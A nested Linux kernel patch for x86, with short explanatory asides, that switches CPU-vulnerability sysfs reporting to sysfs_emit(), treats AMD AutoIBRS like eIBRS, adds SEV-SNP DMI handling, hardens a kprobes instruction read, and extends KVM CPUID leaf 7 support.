+ 	    (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_NEVER &&
+ 	     sched_smt_active())) {
+-		return sprintf(buf, "%s; VMX: %s\n", L1TF_DEFAULT_MSG,
+-			       l1tf_vmx_states[l1tf_vmx_mitigation]);
++		return sysfs_emit(buf, "%s; VMX: %s\n", L1TF_DEFAULT_MSG,
++				  l1tf_vmx_states[l1tf_vmx_mitigation]);
+ 	}
+ 
+-	return sprintf(buf, "%s; VMX: %s, SMT %s\n", L1TF_DEFAULT_MSG,
+-		       l1tf_vmx_states[l1tf_vmx_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; VMX: %s, SMT %s\n", L1TF_DEFAULT_MSG,
++			  l1tf_vmx_states[l1tf_vmx_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t itlb_multihit_show_state(char *buf)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_MSR_IA32_FEAT_CTL) ||
+ 	    !boot_cpu_has(X86_FEATURE_VMX))
+-		return sprintf(buf, "KVM: Mitigation: VMX unsupported\n");
++		return sysfs_emit(buf, "KVM: Mitigation: VMX unsupported\n");
+ 	else if (!(cr4_read_shadow() & X86_CR4_VMXE))
+-		return sprintf(buf, "KVM: Mitigation: VMX disabled\n");
++		return sysfs_emit(buf, "KVM: Mitigation: VMX disabled\n");
+ 	else if (itlb_multihit_kvm_mitigation)
+-		return sprintf(buf, "KVM: Mitigation: Split huge pages\n");
++		return sysfs_emit(buf, "KVM: Mitigation: Split huge pages\n");
+ 	else
+-		return sprintf(buf, "KVM: Vulnerable\n");
++		return sysfs_emit(buf, "KVM: Vulnerable\n");
+ }
+ #else
+ static ssize_t l1tf_show_state(char *buf)
+ {
+-	return sprintf(buf, "%s\n", L1TF_DEFAULT_MSG);
++	return sysfs_emit(buf, "%s\n", L1TF_DEFAULT_MSG);
+ }
+ 
+ static ssize_t itlb_multihit_show_state(char *buf)
+ {
+-	return sprintf(buf, "Processor vulnerable\n");
++	return sysfs_emit(buf, "Processor vulnerable\n");
+ }
+ #endif
+ 
+ static ssize_t mds_show_state(char *buf)
+ {
+ 	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
+-		return sprintf(buf, "%s; SMT Host state unknown\n",
+-			       mds_strings[mds_mitigation]);
++		return sysfs_emit(buf, "%s; SMT Host state unknown\n",
++				  mds_strings[mds_mitigation]);
+ 	}
+ 
+ 	if (boot_cpu_has(X86_BUG_MSBDS_ONLY)) {
+-		return sprintf(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
+-			       (mds_mitigation == MDS_MITIGATION_OFF ? "vulnerable" :
+-			        sched_smt_active() ? "mitigated" : "disabled"));
++		return sysfs_emit(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
++				  (mds_mitigation == MDS_MITIGATION_OFF ? "vulnerable" :
++				   sched_smt_active() ? "mitigated" : "disabled"));
+ 	}
+ 
+-	return sprintf(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t tsx_async_abort_show_state(char *buf)
+ {
+ 	if ((taa_mitigation == TAA_MITIGATION_TSX_DISABLED) ||
+ 	    (taa_mitigation == TAA_MITIGATION_OFF))
+-		return sprintf(buf, "%s\n", taa_strings[taa_mitigation]);
++		return sysfs_emit(buf, "%s\n", taa_strings[taa_mitigation]);
+ 
+ 	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
+-		return sprintf(buf, "%s; SMT Host state unknown\n",
+-			       taa_strings[taa_mitigation]);
++		return sysfs_emit(buf, "%s; SMT Host state unknown\n",
++				  taa_strings[taa_mitigation]);
+ 	}
+ 
+-	return sprintf(buf, "%s; SMT %s\n", taa_strings[taa_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; SMT %s\n", taa_strings[taa_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t mmio_stale_data_show_state(char *buf)
+@@ -2662,7 +2668,8 @@ static ssize_t rfds_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled) &&
++	    !boot_cpu_has(X86_FEATURE_AUTOIBRS))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+@@ -2708,47 +2715,46 @@ static char *pbrsb_eibrs_state(void)
+ static ssize_t spectre_v2_show_state(char *buf)
+ {
+ 	if (spectre_v2_enabled == SPECTRE_V2_LFENCE)
+-		return sprintf(buf, "Vulnerable: LFENCE\n");
++		return sysfs_emit(buf, "Vulnerable: LFENCE\n");
+ 
+ 	if (spectre_v2_enabled == SPECTRE_V2_EIBRS && unprivileged_ebpf_enabled())
+-		return sprintf(buf, "Vulnerable: eIBRS with unprivileged eBPF\n");
++		return sysfs_emit(buf, "Vulnerable: eIBRS with unprivileged eBPF\n");
+ 
+ 	if (sched_smt_active() && unprivileged_ebpf_enabled() &&
+ 	    spectre_v2_enabled == SPECTRE_V2_EIBRS_LFENCE)
+-		return sprintf(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
++		return sysfs_emit(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
+ 
+-	return sprintf(buf, "%s%s%s%s%s%s%s\n",
+-		       spectre_v2_strings[spectre_v2_enabled],
+-		       ibpb_state(),
+-		       boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
+-		       stibp_state(),
+-		       boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
+-		       pbrsb_eibrs_state(),
+-		       spectre_v2_module_string());
++	return sysfs_emit(buf, "%s%s%s%s%s%s%s\n",
++			  spectre_v2_strings[spectre_v2_enabled],
++			  ibpb_state(),
++			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
++			  stibp_state(),
++			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
++			  pbrsb_eibrs_state(),
++			  spectre_v2_module_string());
+ }
+ 
+ static ssize_t srbds_show_state(char *buf)
+ {
+-	return sprintf(buf, "%s\n", srbds_strings[srbds_mitigation]);
++	return sysfs_emit(buf, "%s\n", srbds_strings[srbds_mitigation]);
+ }
+ 
+ static ssize_t retbleed_show_state(char *buf)
+ {
+ 	if (retbleed_mitigation == RETBLEED_MITIGATION_UNRET ||
+ 	    retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
+-	    if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
+-		boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
+-		    return sprintf(buf, "Vulnerable: untrained return thunk / IBPB on non-AMD based uarch\n");
++		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
++		    boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
++			return sysfs_emit(buf, "Vulnerable: untrained return thunk / IBPB on non-AMD based uarch\n");
+ 
+-	    return sprintf(buf, "%s; SMT %s\n",
+-			   retbleed_strings[retbleed_mitigation],
+-			   !sched_smt_active() ? "disabled" :
+-			   spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT ||
+-			   spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT_PREFERRED ?
+-			   "enabled with STIBP protection" : "vulnerable");
++		return sysfs_emit(buf, "%s; SMT %s\n", retbleed_strings[retbleed_mitigation],
++				  !sched_smt_active() ? "disabled" :
++				  spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT ||
++				  spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT_PREFERRED ?
++				  "enabled with STIBP protection" : "vulnerable");
+ 	}
+ 
+-	return sprintf(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
++	return sysfs_emit(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
+ }
+ 
+ static ssize_t gds_show_state(char *buf)
+@@ -2770,26 +2776,26 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 			       char *buf, unsigned int bug)
+ {
+ 	if (!boot_cpu_has_bug(bug))
+-		return sprintf(buf, "Not affected\n");
++		return sysfs_emit(buf, "Not affected\n");
+ 
+ 	switch (bug) {
+ 	case X86_BUG_CPU_MELTDOWN:
+ 		if (boot_cpu_has(X86_FEATURE_PTI))
+-			return sprintf(buf, "Mitigation: PTI\n");
++			return sysfs_emit(buf, "Mitigation: PTI\n");
+ 
+ 		if (hypervisor_is_type(X86_HYPER_XEN_PV))
+-			return sprintf(buf, "Unknown (XEN PV detected, hypervisor mitigation required)\n");
++			return sysfs_emit(buf, "Unknown (XEN PV detected, hypervisor mitigation required)\n");
+ 
+ 		break;
+ 
+ 	case X86_BUG_SPECTRE_V1:
+-		return sprintf(buf, "%s\n", spectre_v1_strings[spectre_v1_mitigation]);
++		return sysfs_emit(buf, "%s\n", spectre_v1_strings[spectre_v1_mitigation]);
+ 
+ 	case X86_BUG_SPECTRE_V2:
+ 		return spectre_v2_show_state(buf);
+ 
+ 	case X86_BUG_SPEC_STORE_BYPASS:
+-		return sprintf(buf, "%s\n", ssb_strings[ssb_mode]);
++		return sysfs_emit(buf, "%s\n", ssb_strings[ssb_mode]);
+ 
+ 	case X86_BUG_L1TF:
+ 		if (boot_cpu_has(X86_FEATURE_L1TF_PTEINV))
+@@ -2828,7 +2834,7 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 		break;
+ 	}
+ 
+-	return sprintf(buf, "Vulnerable\n");
++	return sysfs_emit(buf, "Vulnerable\n");
+ }
+ 
+ ssize_t cpu_show_meltdown(struct device *dev, struct device_attribute *attr, char *buf)
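Two threads run through this bugs.c hunk. First, Automatic IBRS is reported alongside Enhanced IBRS but, like legacy IBRS, it does not protect user space across SMT siblings, so STIBP remains selectable when AUTOIBRS is in use. Second, the vulnerability show handlers move from sprintf() to sysfs_emit(), which verifies the buffer is a sysfs-provided page and clamps output to PAGE_SIZE. The resulting pattern for a show callback, with hypothetical names:

    /* sysfs_emit() knows buf is a full page handed in by sysfs and
     * bounds the write to PAGE_SIZE, unlike raw sprintf(). */
    static ssize_t foo_show(struct device *dev,
                            struct device_attribute *attr, char *buf)
    {
            return sysfs_emit(buf, "%s\n", foo_state_string());
    }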
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 758938c94b41e..ca243d7ba0ea5 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1212,8 +1212,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ 	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+ 
+ 	/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
+-	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
++	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
++	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
+ 
+ 	/* Zhaoxin Family 7 */
+ 	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
+@@ -1362,8 +1362,16 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	   !cpu_has(c, X86_FEATURE_AMD_SSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_SPEC_STORE_BYPASS);
+ 
+-	if (ia32_cap & ARCH_CAP_IBRS_ALL)
++	/*
++	 * AMD's AutoIBRS is equivalent to Intel's eIBRS - use the Intel feature
++	 * flag and protect from vendor-specific bugs via the whitelist.
++	 */
++	if ((ia32_cap & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
+ 		setup_force_cpu_cap(X86_FEATURE_IBRS_ENHANCED);
++		if (!cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
++		    !(ia32_cap & ARCH_CAP_PBRSB_NO))
++			setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
++	}
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_MDS) &&
+ 	    !(ia32_cap & ARCH_CAP_MDS_NO)) {
+@@ -1425,11 +1433,6 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_RETBLEED);
+ 	}
+ 
+-	if (cpu_has(c, X86_FEATURE_IBRS_ENHANCED) &&
+-	    !cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
+-	    !(ia32_cap & ARCH_CAP_PBRSB_NO))
+-		setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+-
+ 	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
+ 		setup_force_cpu_bug(X86_BUG_SMT_RSB);
+ 
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 34d9e899e471e..9b039e9635e40 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -344,7 +344,7 @@ static void __init ms_hyperv_init_platform(void)
+ 		/* Isolation VMs are unenlightened SEV-based VMs, thus this check: */
+ 		if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT)) {
+ 			if (hv_get_isolation_type() != HV_ISOLATION_TYPE_NONE)
+-				cc_set_vendor(CC_VENDOR_HYPERV);
++				cc_vendor = CC_VENDOR_HYPERV;
+ 		}
+ 	}
+ 
+diff --git a/arch/x86/kernel/eisa.c b/arch/x86/kernel/eisa.c
+index e963344b04490..53935b4d62e30 100644
+--- a/arch/x86/kernel/eisa.c
++++ b/arch/x86/kernel/eisa.c
+@@ -2,6 +2,7 @@
+ /*
+  * EISA specific code
+  */
++#include <linux/cc_platform.h>
+ #include <linux/ioport.h>
+ #include <linux/eisa.h>
+ #include <linux/io.h>
+@@ -12,7 +13,7 @@ static __init int eisa_bus_probe(void)
+ {
+ 	void __iomem *p;
+ 
+-	if (xen_pv_domain() && !xen_initial_domain())
++	if ((xen_pv_domain() && !xen_initial_domain()) || cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return 0;
+ 
+ 	p = ioremap(0x0FFFD9, 4);
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index ebe698f8af73b..2aa849705bb68 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -177,10 +177,11 @@ void fpu__init_cpu_xstate(void)
+ 	 * Must happen after CR4 setup and before xsetbv() to allow KVM
+ 	 * lazy passthrough.  Write independent of the dynamic state static
+ 	 * key as that does not work on the boot CPU. This also ensures
+-	 * that any stale state is wiped out from XFD.
++	 * that any stale state is wiped out from XFD. Reset the per CPU
++	 * xfd cache too.
+ 	 */
+ 	if (cpu_feature_enabled(X86_FEATURE_XFD))
+-		wrmsrl(MSR_IA32_XFD, init_fpstate.xfd);
++		xfd_set_state(init_fpstate.xfd);
+ 
+ 	/*
+ 	 * XCR_XFEATURE_ENABLED_MASK (aka. XCR0) sets user features
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 3518fb26d06b0..19ca623ffa2ac 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -148,20 +148,26 @@ static inline void xfd_validate_state(struct fpstate *fpstate, u64 mask, bool rs
+ #endif
+ 
+ #ifdef CONFIG_X86_64
++static inline void xfd_set_state(u64 xfd)
++{
++	wrmsrl(MSR_IA32_XFD, xfd);
++	__this_cpu_write(xfd_state, xfd);
++}
++
+ static inline void xfd_update_state(struct fpstate *fpstate)
+ {
+ 	if (fpu_state_size_dynamic()) {
+ 		u64 xfd = fpstate->xfd;
+ 
+-		if (__this_cpu_read(xfd_state) != xfd) {
+-			wrmsrl(MSR_IA32_XFD, xfd);
+-			__this_cpu_write(xfd_state, xfd);
+-		}
++		if (__this_cpu_read(xfd_state) != xfd)
++			xfd_set_state(xfd);
+ 	}
+ }
+ 
+ extern int __xfd_enable_feature(u64 which, struct fpu_guest *guest_fpu);
+ #else
++static inline void xfd_set_state(u64 xfd) { }
++
+ static inline void xfd_update_state(struct fpstate *fpstate) { }
+ 
+ static inline int __xfd_enable_feature(u64 which, struct fpu_guest *guest_fpu) {
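[Illustration, not part of the patch: a stand-alone sketch of the write-through MSR cache pattern that xfd_set_state() centralizes above. The cached copy and the hardware register are always updated together, so a caller such as fpu__init_cpu_xstate() can no longer write the MSR while leaving the per-CPU cache stale. All names below are stand-ins, not kernel APIs.]

#include <stdint.h>
#include <stdio.h>

static uint64_t hw_msr;        /* models MSR_IA32_XFD */
static uint64_t cached_xfd;    /* models the per-CPU xfd_state cache */

/* Slow path: write the register and the cache together. */
static void xfd_set(uint64_t xfd)
{
	hw_msr = xfd;          /* stands in for wrmsrl() */
	cached_xfd = xfd;
}

/* Fast path: skip the expensive register write on a cache hit. */
static void xfd_update(uint64_t xfd)
{
	if (cached_xfd != xfd)
		xfd_set(xfd);
}

int main(void)
{
	xfd_set(0x4);      /* boot-time reset: both copies now agree */
	xfd_update(0x4);   /* cache hit: no register write */
	xfd_update(0x0);   /* cache miss: register written */
	printf("msr=%#llx cache=%#llx\n",
	       (unsigned long long)hw_msr, (unsigned long long)cached_xfd);
	return 0;
}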
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 6120f25b0d5cc..991f00c817e6c 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -301,7 +301,16 @@ static int can_probe(unsigned long paddr)
+ kprobe_opcode_t *arch_adjust_kprobe_addr(unsigned long addr, unsigned long offset,
+ 					 bool *on_func_entry)
+ {
+-	if (is_endbr(*(u32 *)addr)) {
++	u32 insn;
++
++	/*
++	 * Since 'addr' is not guaranteed to be safe to access, use
++	 * copy_from_kernel_nofault() to read the instruction:
++	 */
++	if (copy_from_kernel_nofault(&insn, (void *)addr, sizeof(u32)))
++		return NULL;
++
++	if (is_endbr(insn)) {
+ 		*on_func_entry = !offset || offset == 4;
+ 		if (*on_func_entry)
+ 			offset = 4;
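[Background for the hunk above, not part of the patch: a kernel-style sketch of the copy_from_kernel_nofault() pattern. The probe address is never dereferenced directly, so an unmapped address yields an error return instead of a fault. Sketch only; assumes <linux/uaccess.h> and is not compilable outside a kernel tree.]

/* Safely read a 32-bit instruction word from an arbitrary kernel
 * address; returns false instead of faulting if addr is not mapped. */
static bool read_insn_nofault(unsigned long addr, u32 *insn)
{
	return copy_from_kernel_nofault(insn, (void *)addr, sizeof(*insn)) == 0;
}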
+diff --git a/arch/x86/kernel/probe_roms.c b/arch/x86/kernel/probe_roms.c
+index 319fef37d9dce..cc2c34ba7228a 100644
+--- a/arch/x86/kernel/probe_roms.c
++++ b/arch/x86/kernel/probe_roms.c
+@@ -203,16 +203,6 @@ void __init probe_roms(void)
+ 	unsigned char c;
+ 	int i;
+ 
+-	/*
+-	 * The ROM memory range is not part of the e820 table and is therefore not
+-	 * pre-validated by BIOS. The kernel page table maps the ROM region as encrypted
+-	 * memory, and SNP requires encrypted memory to be validated before access.
+-	 * Do that here.
+-	 */
+-	snp_prep_memory(video_rom_resource.start,
+-			((system_rom_resource.end + 1) - video_rom_resource.start),
+-			SNP_PAGE_STATE_PRIVATE);
+-
+ 	/* video rom */
+ 	upper = adapter_rom_resources[0].start;
+ 	for (start = video_rom_resource.start; start < upper; start += 2048) {
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 804a252382da7..d1ffac9ad611d 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -9,7 +9,6 @@
+ #include <linux/console.h>
+ #include <linux/crash_dump.h>
+ #include <linux/dma-map-ops.h>
+-#include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/ima.h>
+ #include <linux/init_ohci1394_dma.h>
+@@ -1032,7 +1031,7 @@ void __init setup_arch(char **cmdline_p)
+ 	if (efi_enabled(EFI_BOOT))
+ 		efi_init();
+ 
+-	dmi_setup();
++	x86_init.resources.dmi_setup();
+ 
+ 	/*
+ 	 * VMware detection requires dmi to be available, so this
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 71d8698702ce3..271e70d5748ef 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -553,9 +553,9 @@ static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_le
+ 		leaf->eax = leaf->ebx = leaf->ecx = leaf->edx = 0;
+ 
+ 		/* Skip post-processing for out-of-range zero leafs. */
+-		if (!(leaf->fn <= cpuid_std_range_max ||
+-		      (leaf->fn >= 0x40000000 && leaf->fn <= cpuid_hyp_range_max) ||
+-		      (leaf->fn >= 0x80000000 && leaf->fn <= cpuid_ext_range_max)))
++		if (!(leaf->fn <= RIP_REL_REF(cpuid_std_range_max) ||
++		      (leaf->fn >= 0x40000000 && leaf->fn <= RIP_REL_REF(cpuid_hyp_range_max)) ||
++		      (leaf->fn >= 0x80000000 && leaf->fn <= RIP_REL_REF(cpuid_ext_range_max))))
+ 			return 0;
+ 	}
+ 
+@@ -1060,10 +1060,10 @@ static void __init setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
+ 		const struct snp_cpuid_fn *fn = &cpuid_table->fn[i];
+ 
+ 		if (fn->eax_in == 0x0)
+-			cpuid_std_range_max = fn->eax;
++			RIP_REL_REF(cpuid_std_range_max) = fn->eax;
+ 		else if (fn->eax_in == 0x40000000)
+-			cpuid_hyp_range_max = fn->eax;
++			RIP_REL_REF(cpuid_hyp_range_max) = fn->eax;
+ 		else if (fn->eax_in == 0x80000000)
+-			cpuid_ext_range_max = fn->eax;
++			RIP_REL_REF(cpuid_ext_range_max) = fn->eax;
+ 	}
+ }
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index c8dfb0fdde7f9..e35fcc8d4bae4 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -23,6 +23,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
+ #include <linux/psp-sev.h>
++#include <linux/dmi.h>
+ #include <uapi/linux/sev-guest.h>
+ 
+ #include <asm/cpu_entry_area.h>
+@@ -736,7 +737,7 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ 	 * This eliminates worries about jump tables or checking boot_cpu_data
+ 	 * in the cc_platform_has() function.
+ 	 */
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (!(RIP_REL_REF(sev_status) & MSR_AMD64_SEV_SNP_ENABLED))
+ 		return;
+ 
+ 	 /*
+@@ -758,7 +759,7 @@ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr
+ 	 * This eliminates worries about jump tables or checking boot_cpu_data
+ 	 * in the cc_platform_has() function.
+ 	 */
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (!(RIP_REL_REF(sev_status) & MSR_AMD64_SEV_SNP_ENABLED))
+ 		return;
+ 
+ 	/* Invalidate the memory pages before they are marked shared in the RMP table. */
+@@ -768,21 +769,6 @@ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr
+ 	early_set_pages_state(paddr, npages, SNP_PAGE_STATE_SHARED);
+ }
+ 
+-void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op)
+-{
+-	unsigned long vaddr, npages;
+-
+-	vaddr = (unsigned long)__va(paddr);
+-	npages = PAGE_ALIGN(sz) >> PAGE_SHIFT;
+-
+-	if (op == SNP_PAGE_STATE_PRIVATE)
+-		early_snp_set_memory_private(vaddr, paddr, npages);
+-	else if (op == SNP_PAGE_STATE_SHARED)
+-		early_snp_set_memory_shared(vaddr, paddr, npages);
+-	else
+-		WARN(1, "invalid memory op %d\n", op);
+-}
+-
+ static int vmgexit_psc(struct snp_psc_desc *desc)
+ {
+ 	int cur_entry, end_entry, ret = 0;
+@@ -2152,6 +2138,17 @@ void __init __noreturn snp_abort(void)
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+ }
+ 
++/*
++ * SEV-SNP guests should only execute dmi_setup() if EFI_CONFIG_TABLES are
++ * enabled, as the alternative (fallback) logic for DMI probing in the legacy
++ * ROM region can cause a crash since this region is not pre-validated.
++ */
++void __init snp_dmi_setup(void)
++{
++	if (efi_enabled(EFI_CONFIG_TABLES))
++		dmi_setup();
++}
++
+ static void dump_cpuid_table(void)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 41e5b4cb898c3..a4a921b9e6646 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -3,6 +3,7 @@
+  *
+  *  For licencing details see kernel-base/COPYING
+  */
++#include <linux/dmi.h>
+ #include <linux/init.h>
+ #include <linux/ioport.h>
+ #include <linux/export.h>
+@@ -66,6 +67,7 @@ struct x86_init_ops x86_init __initdata = {
+ 		.probe_roms		= probe_roms,
+ 		.reserve_resources	= reserve_standard_io_resources,
+ 		.memory_setup		= e820__memory_setup_default,
++		.dmi_setup		= dmi_setup,
+ 	},
+ 
+ 	.mpparse = {
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index c3ef1fc602bf9..62a44455c51d0 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -535,9 +535,9 @@ static __always_inline void __kvm_cpu_cap_mask(unsigned int leaf)
+ }
+ 
+ static __always_inline
+-void kvm_cpu_cap_init_scattered(enum kvm_only_cpuid_leafs leaf, u32 mask)
++void kvm_cpu_cap_init_kvm_defined(enum kvm_only_cpuid_leafs leaf, u32 mask)
+ {
+-	/* Use kvm_cpu_cap_mask for non-scattered leafs. */
++	/* Use kvm_cpu_cap_mask for leafs that aren't KVM-only. */
+ 	BUILD_BUG_ON(leaf < NCAPINTS);
+ 
+ 	kvm_cpu_caps[leaf] = mask;
+@@ -547,7 +547,7 @@ void kvm_cpu_cap_init_scattered(enum kvm_only_cpuid_leafs leaf, u32 mask)
+ 
+ static __always_inline void kvm_cpu_cap_mask(enum cpuid_leafs leaf, u32 mask)
+ {
+-	/* Use kvm_cpu_cap_init_scattered for scattered leafs. */
++	/* Use kvm_cpu_cap_init_kvm_defined for KVM-only leafs. */
+ 	BUILD_BUG_ON(leaf >= NCAPINTS);
+ 
+ 	kvm_cpu_caps[leaf] &= mask;
+@@ -652,11 +652,16 @@ void kvm_set_cpu_caps(void)
+ 		F(AVX_VNNI) | F(AVX512_BF16)
+ 	);
+ 
++	kvm_cpu_cap_init_kvm_defined(CPUID_7_2_EDX,
++		F(INTEL_PSFD) | F(IPRED_CTRL) | F(RRSBA_CTRL) | F(DDPD_U) |
++		F(BHI_CTRL) | F(MCDT_NO)
++	);
++
+ 	kvm_cpu_cap_mask(CPUID_D_1_EAX,
+ 		F(XSAVEOPT) | F(XSAVEC) | F(XGETBV1) | F(XSAVES) | f_xfd
+ 	);
+ 
+-	kvm_cpu_cap_init_scattered(CPUID_12_EAX,
++	kvm_cpu_cap_init_kvm_defined(CPUID_12_EAX,
+ 		SF(SGX1) | SF(SGX2)
+ 	);
+ 
+@@ -902,13 +907,13 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		break;
+ 	/* function 7 has additional index. */
+ 	case 7:
+-		entry->eax = min(entry->eax, 1u);
++		max_idx = entry->eax = min(entry->eax, 2u);
+ 		cpuid_entry_override(entry, CPUID_7_0_EBX);
+ 		cpuid_entry_override(entry, CPUID_7_ECX);
+ 		cpuid_entry_override(entry, CPUID_7_EDX);
+ 
+-		/* KVM only supports 0x7.0 and 0x7.1, capped above via min(). */
+-		if (entry->eax == 1) {
++		/* KVM only supports up to 0x7.2, capped above via min(). */
++		if (max_idx >= 1) {
+ 			entry = do_host_cpuid(array, function, 1);
+ 			if (!entry)
+ 				goto out;
+@@ -918,6 +923,16 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 			entry->ecx = 0;
+ 			entry->edx = 0;
+ 		}
++		if (max_idx >= 2) {
++			entry = do_host_cpuid(array, function, 2);
++			if (!entry)
++				goto out;
++
++			cpuid_entry_override(entry, CPUID_7_2_EDX);
++			entry->ecx = 0;
++			entry->ebx = 0;
++			entry->eax = 0;
++		}
+ 		break;
+ 	case 0xa: { /* Architectural Performance Monitoring */
